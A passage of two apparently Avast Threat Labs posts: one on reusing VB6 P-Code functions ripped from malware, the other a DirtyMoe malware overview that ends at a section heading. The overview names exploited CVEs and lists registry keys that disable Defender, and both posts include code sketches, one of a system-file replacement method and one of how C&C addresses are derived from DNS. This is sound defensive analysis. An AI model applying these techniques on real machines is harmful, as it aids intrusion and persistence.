Over the years this topic has come up again and again. Previous articles have included emit based rips [1], exe to dll conversion [2], emulator based approaches [3], and even converting malware into an IPC based decoder service [4].

The above are all native code manipulations which makes them something you can work with directly. Easy to disassemble, easy to debug, easy to patch. (Easy being a relative term of course :))

Lately I have been working on VB6 P-Code, and developing a P-Code debugger. One goal I had was to find a way to call a P-Code function, ripped from a malware sample, with my own arguments. It is very powerful to be able to harness existing code without having to recreate it (including all of its nuances).

Is this even possible with P-Code? As it turns out, it is possible, and I am going to show you how.

The distilled knowledge below is a small slice of what was unraveled during an 8 month research project into the VB6 runtime and P-Code instruction set.

This paper includes 11 code samples which showcase a wide variety of scenarios utilizing this technique [5].

Note on offsets
In several places throughout this paper there may be VB runtime offsets presented. All offsets are to a reference copy with md5: EEBEB73979D0AD3C74B248EBF1B6E770 [6]. Microsoft was kind enough to publish debug symbols for this build including those for the P-Code engine handlers.

Barriers to entry
The VB6 runtime was designed to load executables, dlls, and ocx controls in an undocumented format. This format contains many complex interlinked structures that layout embedded forms, class structures, dependencies etc. During startup the runtime itself also requires certain initialization steps to occur as it prepares itself for use.

If we wish to execute P-Code buffers out of the context of a VB6 host executable there are several hurdles we must overcome:

VB Runtime Initialization 

Standard runtime initialization for executables takes place through the ThunRTMain export. This is the primary entry point for loading a VB6 executable. This function takes 1 argument that is the address of the top level VB Header structure. This structure contains the full complex hierarchy of everything else within. 

While we can utilize this path for our needs, there are easier ways to go about it. Starting from ThunRTMain can also create some problems on process termination so we will avoid it. 

In 2003 when exploring VB6’s ability to generate standard dlls I found a second path to runtime initialization through the CreateIExprSrvObj export.

This export is simple to call and automatically performs the majority of runtime initialization. Some TLS structure fields, however, are left out. In testing, most things operate fine. The only errors discovered occur when trying to use native VB file commands, MsgBox, or the built-in App object.

With a little extra leg work it has been found that the TLS structures can be manually completed to regain access to most of this native functionality. 

Finally, if the P-Code buffer creates COM objects, a manual call to CoInitialize must also be performed. 

Replicating basic object structures

Once CreateIExprSrvObj has been executed, we can call into P-Code streams as many times as we want from our loader code. Structure initialization is minimal and only requires the following fields: 

If the P-Code routines utilize global variables then the codeObj.aModulePublic field will also have to be set to a writable block of memory. This has been demonstrated in the globalVar and complex_globals examples. We can even pre-initialize these variables here if we desire. 

In addition to filling out these primary structures, we also have to recreate the constant pool as expected by the specific P-Code. Finally we must also update a structure field in the P-Code to point to our current object Info structure. 

While this may sound complex, there is a generator utility which automatically does all of the work for you in the majority of cases. A more detailed explanation of the following code will be presented in later sections. 

Finding an entrypoint to transition into P-Code execution 

Execution of the VB6 P-Code occurs by calling the ProcCallEngine export of the VB runtime. The stub below is the same mechanism used internally by VB compiled applications to transfer execution between sub functions.

The offset_sub_main argument moved into EDX is the address of the target P-Code function's trailing structure that defines attributes of the function. We will discuss this structure in the following sections. 

The asm stub above shows the default scenario of calling a P-Code function with no arguments. A video showing this running in a debugger is available [7].

In the decrypt_test example we explore how to call a ripped function with a complex prototype and a Variant return value. This example demonstrates reusing an extracted P-Code decoder from a malware executable. Here we can call the extracted P-Code function passing it our own data:

Understanding P-Code function layout 

P-Code functions in compiled executables are linked by a structure that trails the actual byte code. This structure is called RTMI in the VB runtime symbols, and the reversing community refers to it as ProcDscInfo. A partial excerpt of this structure is shown below: 

When we rip a P-Code function from a compiled binary, we must also extract the configured RTMI structure. ProcCallEngine requires this information in order to run a P-Code routine successfully. 

When we relocate the P-Code block outside of the target binary, we must also update the link to our new object Info table.

This is what is being set in the generated code: 

Here the rc4 buffer contains the entire ripped function, starting with the P-Code and then followed by the RTMI structure which starts at offset 0x3e4. We then patch in the address of our manually filled out object Info into the RTMI.pObjTable field. Once this is complete, the P-Code is ready for execution.
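This relink step can be sketched as follows. The blob, object Info address, and the single-member RTMI layout are all placeholders for illustration; only the 0x3e4 offset matches the example above:

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Illustrative partial layout: only pObjTable matters here, and its
   position within the real RTMI is an assumption for this sketch. */
typedef struct {
    uint32_t pObjTable;    /* link to our manually built object Info */
    /* ... remaining RTMI fields elided ... */
} RTMI;

/* Relink a ripped blob laid out as [P-Code bytes][RTMI structure]:
   write our object Info address into RTMI.pObjTable. */
void relink_proc(unsigned char *blob, size_t rtmi_off, uint32_t obj_info)
{
    memcpy(blob + rtmi_off, &obj_info, sizeof(obj_info));
}

int demo(void)
{
    unsigned char rc4[0x400] = {0};        /* fake ripped function blob */
    relink_proc(rc4, 0x3e4, 0x00DEAD00u);  /* RTMI begins at 0x3e4      */
    uint32_t v;
    memcpy(&v, rc4 + 0x3e4, sizeof(v));
    return v == 0x00DEAD00u;
}
```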

Code Generation 

When developing a method such as this, we must start with known quantities. For our purposes we are writing our own test code which is done normally in the VB6 Integrated Development Environment. This code is then extracted using a utility which generates the C or VB6 source necessary to execute it independently.

The generator tool we are using in this paper is the free VBDec [8] P-Code debugger. 

While exploring this technique, the sample code has been optimized to follow several conventions for clarity. For this research all code samples were ripped from functions in a single module. This design was chosen so that all sub function access occurs through the ImpAdCall* opcodes which draw directly against function pointers in the const pool. 

Code taken from instanced form or class compilation units would require support to replicate VTable layouts for the *Vcall opcodes. While this can be done I will leave that as future work for now.

Samples are available that make extensive use of callbacks to integrate tightly with the host code. This is useful for integrating debug output through the C host in a simple manner. 

Callbacks are accessed through the standard VB API Declare syntax which is a core part of the language and is well documented. Below are examples of sending both numeric and string debug info from the P-Code to the host. 

Giving VB direct access to the host functions is as simple as setting their address in the corresponding constant pool slot. 
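A minimal sketch of this wiring, assuming (for illustration only) that the const pool is an array of generic pointers and that slot 3 is the one the compiler assigned to the callback stub:

```c
/* Const pool modelled as an array of generic pointers. On 32-bit
   Windows the callback must be __stdcall to match the Declare
   statement; plain calling convention is used here for the sketch. */
typedef void (*dbg_int_fn)(int);

static void *g_const_pool[16];

static int g_last_int;
static void dbg_int(int v) { g_last_int = v; }   /* host-side callback */

void wire_callbacks(void)
{
    /* VB side: Declare Sub DbgInt Lib "dummy" (ByVal v As Long) */
    g_const_pool[3] = (void *)dbg_int;           /* slot 3: DbgInt stub */
}

int demo(void)
{
    wire_callbacks();
    ((dbg_int_fn)g_const_pool[3])(42);   /* what an ImpAdCall* would do */
    return g_last_int;
}
```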

Ripping functions with VBDec is easy: simply right-click on the function in the left-hand treeview and choose the Rip menu option. VBDec will generate all of the embedding data for you. Multiple functions can be ripped at once by right-clicking on the top level module name. 

A corresponding const pool will also be auto-generated along with stubs to update the object Info pointers and asm stubs to call interlinked sub functions.

Once extraction/generation is complete it is left up to the developer to integrate the data into one of the sample frameworks provided.

A spectrum of samples are provided ranging from very simple, to quite complex. Samples include:

Sample Description
firstTest simple addition test
globalVar global variables test
structs passing structs from C to P-Code
two_funcs interlink two P-Code functions
ConstPool test decoding a binary const pool entry
lateBinding late bind sapi voice example
earlyBinding early bind sapi voice example
decrypt_test P-Code decryptor w/ complex prototype
Variant Data C host returns variant types from callback to P-Code
benchmark RC4 benchmarking in C-hosted P-Code and straight C

Understanding the Const Pool 

Each compilation unit, such as a module, class, or form, gets its own constant pool, which is shared by all of the functions in that file. Pool entries are built up on demand as the file is processed by the compiler from top to bottom.

The constant pool can contain several types of entries such as: 

  • string values (BSTRs specifically) 
  • VB method native call stubs 
  • API import native call stubs 
  • COM GUIDs 
  • COM CLSID / IID pairs held in COMDEF structures 
  • CodeObject base offsets (not applicable to our work here) 
  • internal runtime COM objects filled out at startup (not supported) 

VBDec is capable of automatically deciphering these entries and figuring out what they represent. Once the correct type has been determined, it can generate the C or VB source necessary to fill out the const pool in the host code. The constant pool viewer form allows you to manually view these entries.

In testing it has performed extremely well, outputting complete const pools which require little to no modification. 

For callback integration with the host, if you use “dummy” as the dll name, it will automatically be assumed as a host callback. Otherwise it will be translated literally as a LoadLibrary/GetProcAddress call.

Some const pool entries may show up as Unknown. When you click on a specific entry the raw data at that offset will be loaded into the lower textbox. If this data shows all 00 00 00 00’s then this is a reference to an internal VB runtime COM object that would normally be set to a live instance at initialization.

This has been seen when using the App object. Normally this would be set @6601802F inside the _TipRegAppObject function of the runtime on initialization. These types of entries are not currently supported using this technique (and would not make sense in our context anyway). 

Interlinked sub functions are supported. A corresponding native stub will be generated along with an entry in the const pool for it. 

Early binding and late binding to COM objects is also supported. Late binding is done entirely through strings in the const pool. For early binding you will see a COMDEF structure and CLSID / IID data automatically generated.

The following is taken from the early binding sample which loads the Sapi.SpVoice COM object. 

Generation of this code is generally automatic by VBDec but there may be times where the tool can not automatically detect which kind of const pool entry is being specified. In these cases you may have to manually explore the const pool and extract the data yourself.

In the above scenario the file data at the const pool address may look similar to the following:

If we visualize this as a COMDEF structure we can see the values 0, 0x401230, 0x401240, 0. Looking at the file offsets for these virtual addresses we find the GUIDs given above. 

String entries are held as BSTRs, which are length-prefixed unicode strings. Since we are in complete control of the const pool, and BSTRs can encapsulate binary data, it is possible to include encrypted strings directly in the const pool using SysAllocStringByteLen. The binary_ConstPool* samples demonstrate this technique. You can also dynamically swap out const pool entries to change functionality as the P-Code runs. An example of this is found in the early bind sample. 

Note: It is important to use the SysAlloc* string functions to get real BSTRs for const pool entries. As the strings get used by the runtime, it may try to realloc or release them.
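To make the layout concrete, here is a simplified stand-in for SysAllocStringByteLen showing why a BSTR can carry raw binary: the 4-byte length prefix, not a null terminator, defines the payload size. This is an illustrative model, not the oleaut32 implementation (real const pool entries must use the genuine SysAlloc* functions, per the note above):

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* A BSTR points at the character data, with a 4-byte byte-length prefix
   before it and a 2-byte null terminator after it. */
unsigned char *alloc_bstr_bytelen(const void *bytes, uint32_t len)
{
    unsigned char *p = malloc(4 + len + 2);
    if (!p) return NULL;
    memcpy(p, &len, 4);                   /* length prefix (in bytes)   */
    memcpy(p + 4, bytes, len);            /* payload may be raw binary  */
    p[4 + len] = 0;
    p[4 + len + 1] = 0;                   /* UTF-16 null terminator     */
    return p + 4;                         /* BSTR = pointer past prefix */
}

uint32_t bstr_bytelen(const unsigned char *bstr)  /* cf. SysStringByteLen */
{
    uint32_t len;
    memcpy(&len, bstr - 4, 4);
    return len;
}

int demo(void)
{
    const unsigned char enc[] = { 0x01, 0x00, 0xFF };  /* "encrypted" blob */
    unsigned char *s = alloc_bstr_bytelen(enc, 3);
    int ok = s && bstr_bytelen(s) == 3 && s[2] == 0xFF;
    if (s) free(s - 4);                  /* free from the true allocation */
    return ok;
}
```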

Extended TLS Initialization

The VB6 runtime stores several key structures in Thread Local Storage (TLS). Several functions of the runtime require these structures to be initialized. These structures are critical for VB error handling routines and can also come into play for file access functions.

Below is the code for the rtcGetErl export. This function retrieves the user specified error line number associated with the last exception that occurred.

From this snippet of code we can see that the runtime stores the TLS slot value at offset 66110000. Once the actual memory address is retrieved with TlsGetValue, the structure field at 0x98 is returned as the stored last error line number. In this manner we can begin to understand the meaning of the various structure offsets.

Even without a full analysis of the complete 0xA8 byte structure we can compare the values seen between a fully initialized process with those initialized through the CreateIExprSrvObj export.

Once diffed, two main empty slots are observed which normally point to other allocations.

  • field 0x18 – normally set @ 66015B25 in EbSetContextWorkerThread
  • field 0x48 – normally set @ 66018081 in RegAppObjectOfProject

Field 0x48 is used for access to the internal VB App COM object. This object does not make sense in our scenario and does not trigger any exceptions if left blank. If we had to replicate the COM object for compatibility with existing code, we could insert a dummy object.

The allocation at offset 0x18 is only required if we wish to use built-in VB file operation commands or the MsgBox function.

For compatibility with ripped code, it was interesting to see if a manual allocation would allow the runtime to operate properly.

The following code was created to dynamically look up the TLS slot value, retrieve the tlsEbthread memory offset, and then manually link a new allocation into the missing 0x18 field.

Once the above code was integrated, full access to the native VB file access functions was restored. Again, this extended initialization is not always required.
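The linking logic can be modelled in plain C. Here the per-thread structure is an opaque 0xA8-byte block standing in for what TlsGetValue would return; the 0x18 field offset comes from the diff above, everything else is illustrative:

```c
#include <stdlib.h>
#include <string.h>

#define TLS_EBTHREAD_SIZE 0xA8
#define FIELD_WORKER      0x18   /* normally set in EbSetContextWorkerThread */

/* If field 0x18 of the per-thread structure is still NULL, link in a
   fresh zeroed allocation. Returns 1 if patched, 0 if already set,
   -1 on allocation failure. */
int fixup_tls(unsigned char *tlsEbThread, size_t alloc_size)
{
    void *cur;
    memcpy(&cur, tlsEbThread + FIELD_WORKER, sizeof(cur));
    if (cur != NULL)
        return 0;
    void *fresh = calloc(1, alloc_size);
    if (!fresh)
        return -1;
    memcpy(tlsEbThread + FIELD_WORKER, &fresh, sizeof(fresh));
    return 1;
}

int demo(void)
{
    unsigned char tls[TLS_EBTHREAD_SIZE] = {0}; /* TlsGetValue() stand-in */
    int first  = fixup_tls(tls, 0x40);          /* patches the empty slot */
    int second = fixup_tls(tls, 0x40);          /* already set: no-op     */
    void *p;
    memcpy(&p, tls + FIELD_WORKER, sizeof(p));
    free(p);
    return first == 1 && second == 0;
}
```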

Debugging integration’s 

When testing this technique it is best to start with your own code that you control. This way you can get familiar with it and develop a feel for working with (and recognizing) the different function prototypes.

The first step is to write and debug your VB6 code as normal in the VB6 IDE. In preparation for running as a byte buffer, you can then pepper the VB code with progress callbacks to API Declare routines which would normally access C dll exports. You don't actually have to write the dll, but you can. The calls are identical when hosted internally from a native C loader (or even a VB-hosted AddressOf callback routine). 

If you are calling into a P-Code function with a specific prototype, this is the trickiest part of the integration. Samples are available which pass in int, structures, references, Variants, bools and byte arrays. You will have to be very aware if arguments are being passed in ByVal, or the default ByRef (pointers).

Also pay attention to the function return types. If no argument/return type is defined, it defaults to a COM Variant. VB functions receive variant return values by pushing an extra empty one onto the stack before calling the function. Simple numeric return values are passed back in EAX as normal.

When interacting with callbacks make sure the callbacks are defined as __stdcall. All of the standard VB6 <–> C development knowledge applies. You can cut your teeth on these rules by working with standard C dlls and debugging in Visual Studio from the dll side while launching a VB6 exe host.

When in doubt you can create simple tests to debug just the function prototypes. For the complex prototype decryptor sample given above, I had the VB6 sub main() code call the rc4 function with expected parameters to test it in its natural environment. I could then debug the VB6 executable to watch the exact stack parameters passed to develop more insight into how to replicate it manually from my C loader.

This can be done with a native debugger by setting a breakpoint @6610664E on the ImpAdCallFPR4 handler in the VB runtime. Here you could examine the stack before entry into the target P-Code function. VBDec’s P-Code debugger is also convenient for this task.

When debugging it is best to have the reference copy of the VB runtime in the same directory as the target executable so that all of your offsets line up with your runtime disassembly with debug symbols. If you use IDA as your debugger, start with the disassembly of the VB runtime and set the target executable in the debugger options. Asm focused debuggers such as Olly or x64dbg are highly recommended over Visual Studio which is primarily based around source code debugging. 


When working on malware analysis it is a common task to have to interoperate with various types of custom decoding routines. There are multiple approaches to this. One can sit down and reverse engineer the entire routine and make sure your code is 100% compatible, or you can try to explore rip based techniques. 

Ripping decoders is a fairly common task in my personal playbook. While researching the internals of the VB runtime it was a natural inquiry for me to see if the same concept could be applied to P-Code functions. 

With some experimentation, and a suitable generator, this technique has proven stable and relatively easy to implement. These experiments have also deepened my insights into how the various structures are used by the runtime and my appreciation for how tightly VB6 can integrate with C code. 

Hopefully this information will give you a new arrow to add to your quiver, or at least have been an interesting ride. 

[1] Emit based rip
[2] Using an exe as a dll
[3] Running byte blobs in scdbg
[4] Malware IPC decoder service
[5] Code samples
[6] VB6 runtime with symbols
[7] VB6 internals video
[8] VBDec P-Code Debugger

The post Binary Reuse of VB6 P-Code Functions appeared first on Avast Threat Labs.

DirtyMoe: Introduction and General Overview of Modularized Malware

16 June 2021 at 11:56


The rising price of cryptocurrencies has caused a skyrocketing number of malware samples in the wild. DDoS attacks go hand in hand with the mining of cryptocurrencies to increase the attackers' revenue. Moreover, the temptation grows if you have thousands of victims at your disposal.

This article presents the result of our recent research on the DirtyMoe malware. We noticed that the NuggetPhantom malware [1] had been the first version of DirtyMoe, and that PurpleFox is its exploit kit [2]. We date the first mention of the malware to 2016. The malware has followed a fascinating evolution during the last few years. The first samples were often unstable and produced obvious symptoms. Nonetheless, the current samples are on par with other malware in their use of anti-forensic, anti-tracking, and anti-debugging techniques.

The DirtyMoe malware uses a simple idea of how to be modularized, undetectable, and untrackable at the same time. The malware is focused on cryptojacking and DDoS attacks. DirtyMoe is run as a Windows service under system-level privileges via EternalBlue and at least three other exploits. The particular functionality is controlled remotely by the malware authors, who can reconfigure thousands of DirtyMoe instances to the desired functionality within a few hours. DirtyMoe just downloads an encrypted payload corresponding to the required functionality and injects the payload into itself.

DirtyMoe’s self-defense and hiding techniques can be found at both the local and network layers. The core of DirtyMoe is a service that is protected by VMProtect. It extracts a Windows driver that utilizes various rootkit capabilities such as service, registry entry, and driver hiding. Additionally, the driver can hide selected files on the system volume and can inject an arbitrary DLL into each newly created process in the system. The network communication with a mother server is not hard-coded and is not invoked directly. DirtyMoe makes a DNS request to one hard-coded domain using a set of hard-coded DNS servers. However, the final IP address and port are derived using another sequence of DNS requests. So, blocking one final IP address does not neutralize the malware, and we also cannot block DNS requests to DNS servers such as Google, Cloudflare, etc.

This is the first article of the DirtyMoe series. In it, we present a high-level overview of DirtyMoe's complex architecture. The following articles will focus on detailed aspects of the DirtyMoe architecture, such as the driver, services, modules, etc. In this article, we describe DirtyMoe's kill chain, sophisticated network communication, self-protection techniques, and significant symptoms. Further, we present statistical information about the prevalence and location of the malware and C&C servers. Finally, we discuss and summarize the relationship between DirtyMoe and PurpleFox. Indicators of Compromise lists will be published in future posts for each malware component.

1. Kill Chain

The following figures illustrate two views of the DirtyMoe architecture. The first covers delivery, and the second covers exploitation and installation. Individual kill chain items are described in the following subsections.

Figure 1. Kill Chain: Delivery
Figure 2. Kill Chain: Exploitation and Installation

1.2 Reconnaissance

Through port scanning and open vulnerability databases, the attackers find and target large numbers of weak computers. PurpleFox is the exploit kit commonly used for DirtyMoe.

1.3 Weaponization

The DirtyMoe authors apply several explicit techniques to gain admin privileges for a DirtyMoe deployment.

One of the favorite exploits is EternalBlue (CVE-2017-0144), even though this vulnerability has been well known since 2017. Avast still blocks around 20 million EternalBlue attack attempts every month. Unfortunately, a million machines still run the vulnerable SMBv1 protocol, opening the door to malware, including DirtyMoe, via privilege escalation [3]. Recently, a new infection vector that cracks Windows machines through SMB password brute force has been on the rise [2].

Another way to infect a victim machine with DirtyMoe is phishing emails containing URLs that exploit targets via Internet Explorer; for instance, the Scripting Engine Memory Corruption Vulnerability (CVE-2020-0674). The vulnerability corrupts memory in such a way that attacker code runs in the context of the current user. If the current user is logged in as an administrator, the code takes control of the affected machine [4]. One can only wonder how many users still browse with a vulnerable Internet Explorer.

Further, a wide range of infected files is used to deploy DirtyMoe. Cracks, keygens, and even legitimate-looking applications can contain malicious code that installs the malware on victim machines as part of their execution. Customarily, the installation happens silently in the background, without user interaction or the user's knowledge. Infected macros, self-extracting archives, and repacked installers of popular applications are the typical vehicles.

We have given the most well-known examples above, but the ways to deploy malware are unlimited. They all have one thing in common: a Common Vulnerabilities and Exposures (CVE) entry. A description of the exact methods used to install DirtyMoe is out of this article's scope. However, we list a short selection of CVEs used by DirtyMoe as follows:

  • CVE-2019-1458, CVE-2015-1701, CVE-2018-8120: Win32k Elevation of Privilege Vulnerability
  • CVE-2014-6332: Windows OLE Automation Array Remote Code Execution Vulnerability

1.4 Delivery

When one of the exploits succeeds and gains system privileges, DirtyMoe can be installed on a victim's machine. We observed that DirtyMoe utilizes the Windows MSI installer to deploy the malware. The MSI installer provides an easy way to install software across several platforms and versions of Windows, each of which requires different locations for installed files and registry entries. The malware authors can therefore comfortably set up DirtyMoe configurations for the target system and platform.

1.4.1 MSI Installer Package

Via the MSI installer, the malware authors prepare the victim environment, focusing on disabling anti-spyware and file protection features. Additionally, the MSI package abuses one system feature that helps overwrite system files for malware deployment.

Registry Manipulation

There are several registry manipulations during MSI installation. The most crucial registry entries are described in the following overview:

  • Microsoft Defender Antivirus can be disabled by the DisableAntiSpyware registry key set to 1.
    • HKCU\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
  • Windows File Protection (WFP) of critical Windows system files is disabled.
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCScan
  • Disables SMB sharing to prevent infection by other malware
    • HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\SMBDeviceEnabled
  • Replacing system files by the malware ones
    • HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AllowProtectedRenames
    • HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations
  • Sets the threshold to the maximum value to ensure that each service is run as a thread and the service is not a normal process.
    • HKLM\SYSTEM\CurrentControlSet\Control\SvcHostSplitThresholdInKB

File Manipulation

The MSI installer copies files to defined destinations if an appropriate condition is met, as the following table summarizes.

File Destination Condition
sysupdate.log WindowsFolder Always
winupdate32.log WindowsFolder NOT VersionNT64
winupdate64.log WindowsFolder VersionNT64

Windows Session Manager (smss.exe) copies the files during Windows startup according to the value of the PendingFileRenameOperations registry entry as follows:

  • Delete (if exist) \\[WindowsFolder]\\AppPatch\\Acpsens.dll
  • Move \\[SystemFolder]\\sens.dll to \\[WindowsFolder]\\AppPatch\\Acpsens.dll
  • Move \\[WindowsFolder]\\winupdate[64,32].log to \\[SystemFolder]\\sens.dll
  • Delete (if exist) \\[WindowsFolder]\\AppPatch\\Ke583427.xsl
  • Move \\[WindowsFolder]\\sysupdate.log to \\[WindowsFolder]\\AppPatch\\Ke583427.xsl
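The rename/delete operations above map onto the documented PendingFileRenameOperations format: a REG_MULTI_SZ of source/destination string pairs, where an empty destination means delete and a '!' destination prefix allows replacing an existing file. A hedged sketch building such a value follows (narrow strings for simplicity, where the real value is UTF-16, and the concrete paths are illustrative):

```c
#include <string.h>

/* Append one source/destination pair to a REG_MULTI_SZ style buffer.
   Kernel paths carry a \??\ prefix; dst may be "" for delete. */
static size_t add_pair(char *buf, size_t off, const char *src, const char *dst)
{
    size_t n = strlen(src) + 1;
    memcpy(buf + off, src, n); off += n;
    n = strlen(dst) + 1;
    memcpy(buf + off, dst, n); off += n;
    return off;
}

/* Build a value for "delete Acpsens.dll, then move sens.dll over it". */
size_t build_pfro(char *buf)
{
    size_t off = 0;
    off = add_pair(buf, off, "\\??\\C:\\Windows\\AppPatch\\Acpsens.dll", "");
    off = add_pair(buf, off, "\\??\\C:\\Windows\\System32\\sens.dll",
                             "!\\??\\C:\\Windows\\AppPatch\\Acpsens.dll");
    buf[off++] = '\0';                   /* REG_MULTI_SZ double terminator */
    return off;
}

int demo(void)
{
    char buf[512];
    size_t n = build_pfro(buf);
    /* first string is the source of the delete operation */
    return n > 0 && strcmp(buf, "\\??\\C:\\Windows\\AppPatch\\Acpsens.dll") == 0;
}
```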

1.4.2 MSI Installation

The MSI installer can be run silently, without any user interaction. The installation requires a system restart to apply all changes, but the MSI installer supports delayed restart, so the user does not notice any suspicious symptoms. The MSI installer prepares all necessary files and configurations to deploy the DirtyMoe malware. After the system reboot, the system overwrites the defined system files, and the malware runs. We will describe the detailed analysis of the MSI package in a separate article.

1.5 Exploitation

The MSI package overwrites the system file sens.dll via the Windows Session Manager. Therefore, DirtyMoe abuses the Windows System Event Notification (SENS) to be started by the system. The infected SENS Service is a mediator which deploys a DirtyMoe Service.

In the first phase, the abused service ensures that DirtyMoe will be loaded after the system reboot and restores the misused Windows service to the original state. Secondly, the main DirtyMoe service is started, and a rootkit driver hides the DirtyMoe’s services, registry entries, and files.

1.5.1 Infected SENS Service

Windows runs the original SENS under NT AUTHORITY\SYSTEM user. So, DirtyMoe gains system-level privileges. DirtyMoe must complete three basic objectives on the first run of the infected SENS Service.

  1. Rootkit Driver Loading
DirtyMoe runs in user mode, but the malware needs support from kernel space. Most kernel actions try to hide or anti-track DirtyMoe activities. A driver binary is embedded in the DirtyMoe service and is loaded when DirtyMoe starts.
  2. DirtyMoe Service Registration
    The infected SENS Service registers the DirtyMoe Service in the system as a regular Windows service. Consequently, the DirtyMoe malware can survive the system reboot. The DirtyMoe driver is activated at this time; hence the newly created service is hidden too. DirtyMoe Service is the main executive unit that maintains all malware activities.
  3. System Event Notification Service Recovery
    If the DirtyMoe installation and service deployment is successful, the last step of the infected SENS Service is to recover the original SENS service from the Acpsens.dll backup file; see File Manipulation.

1.5.2 DirtyMoe Service

DirtyMoe Service is registered in the system during the malware's deployment. At startup, the service extracts and loads the DirtyMoe driver to protect itself. Once the driver is loaded, the service cleans up all evidence of the driver from the file system and registry.

The DirtyMoe malware is composed of two processes, DirtyMoe Core and DirtyMoe Executioner, which are created by the DirtyMoe Service; the service terminates itself once both processes are created and configured. The Core and Executioner processes are spawned through a chain of intermediate processes and threads that are terminated over time, which makes forensics and tracking more difficult. The DirtyMoe services and processes will be described in detail in a future article.

1.6 Installation

Everything described above is only preparation for the malicious execution. DirtyMoe Core is the maintenance process that manages downloading, updating, encrypting, backing up, and protecting the DirtyMoe malware. DirtyMoe Core is responsible for injecting malicious code into DirtyMoe Executioner, which executes it. The injected code, called a MOE object or module, is downloaded from a C&C server. MOE objects are encrypted PE files that DirtyMoe Core decrypts and injects into DirtyMoe Executioner.

Additionally, the initial payload that determines the introductory behavior of DirtyMoe Core is deployed by the MSI Installer as the sysupdate.log file. Therefore, DirtyMoe Core can update or change its own functionality by payload injection.

1.7 Command and Control

DirtyMoe Core and DirtyMoe Executioner provide an interface for the malware authors, who can modularize DirtyMoe remotely and change its purpose and configuration via MOE objects. DirtyMoe Core communicates with the command and control (C&C) server to obtain attacker commands. Accordingly, the whole complex hierarchy is highly modular and very flexible to configure and control.

The insidious part of the C&C communication is that DirtyMoe does not use fixed IP addresses but implements a unique mechanism to obfuscate the final C&C server address. It is therefore impossible to block the C&C server on a victim's machine, since the server address is different for each C&C communication. Moreover, the mechanism is based on DNS requests, which cannot easily be blocked because doing so would affect everyday communications.

1.8 Actions on Objective

Regarding DirtyMoe's modularity, crypto-mining seems to be a continuous activity that uses victim machines permanently whenever the malware authors do not need to run targeted attacks. So, crypto-mining is the peacetime activity. However, the NSFOCUS Threat Intelligence center also discovered distributed denial-of-service (DDoS) attacks [1]. In general, DirtyMoe can deploy arbitrary malware onto infected systems, such as information stealers, ransomware, trojans, etc.

2. Network Communication

As noted above, the network communication with the C&C server is sophisticated. The IP address of the C&C server is not hardcoded because it is derived from DNS requests. There are three pieces of information hardcoded in the code.

  1. A list of public DNS servers such as Google, Cloudflare, etc.
  2. A hard-coded domain rpc[.]1qw[.]us is an entry point to get the final IP address of the C&C server.
  3. Bulgarian constants (magic constants chosen to make the result come out right) that are used for the translation of IP addresses.

A DNS request to the 1qw[.]us domain returns a list of live servers, but these are not the final C&C servers. DirtyMoe converts a returned IP address to an integer and subtracts the first Bulgarian constant to calculate the final C&C IP address. To make things even harder, a C&C port is also derived from the final IP address using the second Bulgarian constant.
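The translation can be sketched as follows. The constants here are made up for illustration, since the real "Bulgarian constants" are hardcoded in the sample, and the XOR-and-modulo port derivation is an assumption; the article only states that the port is derived from the final address using the second constant.

```python
import socket
import struct

# Hypothetical constants for illustration only; the real values
# are hardcoded in the DirtyMoe binary.
IP_CONSTANT = 0x01020304
PORT_CONSTANT = 0xBEEF

def derive_cc(dns_answer_ip: str) -> tuple[str, int]:
    """Turn an IP returned for rpc[.]1qw[.]us into the real C&C socket."""
    # IP string -> 32-bit big-endian integer
    as_int = struct.unpack(">I", socket.inet_aton(dns_answer_ip))[0]
    # subtract the first constant to get the final C&C address
    cc_int = (as_int - IP_CONSTANT) % 2**32
    cc_ip = socket.inet_ntoa(struct.pack(">I", cc_int))
    # assumption: the port is some cheap mix of the final address
    # with the second constant
    cc_port = (cc_int ^ PORT_CONSTANT) % 65536
    return cc_ip, cc_port
```

Because the DNS answers rotate every minute, each victim computes a different socket per lookup, which is what makes static IP blocklists ineffective here.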

The insidiousness of the translation lies in its use of DNS requests, which cannot easily be blocked because users need IP translation. DirtyMoe sends requests to public DNS servers, which resolve the 1qw[.]us domain recursively. Therefore, victim machines do not contact the malicious domain directly but via one of the hardcoded public DNS servers. Moreover, the list of returned IP addresses changes every minute.

We have recorded approx. 2,000 IP addresses to date. Many translated IP addresses lead to live web servers, mostly with Chinese content. It is unclear whether the malware authors own the web servers or whether the web servers have simply been compromised by DirtyMoe.

3. Statistics

According to our observations, the first significant occurrence of DirtyMoe was in 2017. The number of DirtyMoe hits was in the thousands between 2018 and 2020.

3.1 DirtyMoe Hits

The number of incidents this year has increased by orders of magnitude, as the logarithmic scale of Figure 3 indicates. On the other hand, it must be noted that we improved our detection of DirtyMoe in 2020. We have recorded approx. one hundred thousand infected and active machines to date. It is evident that the DirtyMoe malware is still active and on the rise, so we will have to watch out and stay sharp.

Figure 3. Annual occurrences of DirtyMoe hits

The dominant country for DirtyMoe hits is Russia, specifically 65 k of 245 k hits; see Figure 4. DirtyMoe leads in Europe and Asia, as Figure 5 illustrates. America also has a significant share of hits.

Figure 4. Distribution of hits by country
Figure 5. Distribution of hits by continent

3.2 C&C Servers

We observed a different distribution of countries and continents for C&C servers (IP addresses) than for sample hits. Most of the C&C servers are located in China, as Figures 6 and 7 demonstrate. We can deduce that the malware originates from China. It is also evident that the malware authors are a well-organized group that operates on all major continents.

Figure 6. Distribution of C&C servers by country
Figure 7. Distribution of C&C servers by continent

3.3 VMProtect

In the last two years, DirtyMoe has used the volume ID of the victim's machine as the name of its service DLL. The first versions of DirtyMoe used a Windows service name selected at random; this was dominant in 2018, see Figure 8.

Figure 8. Distribution of cases using service names

We detected the first significant occurrence of VMProtect at the end of 2018. Obfuscation via VMProtect has been continuously observed since 2019. Before VMProtect, the malware authors relied on common obfuscation methods, which are still present in the VMProtect-protected versions of DirtyMoe.

4. Self Protecting Techniques

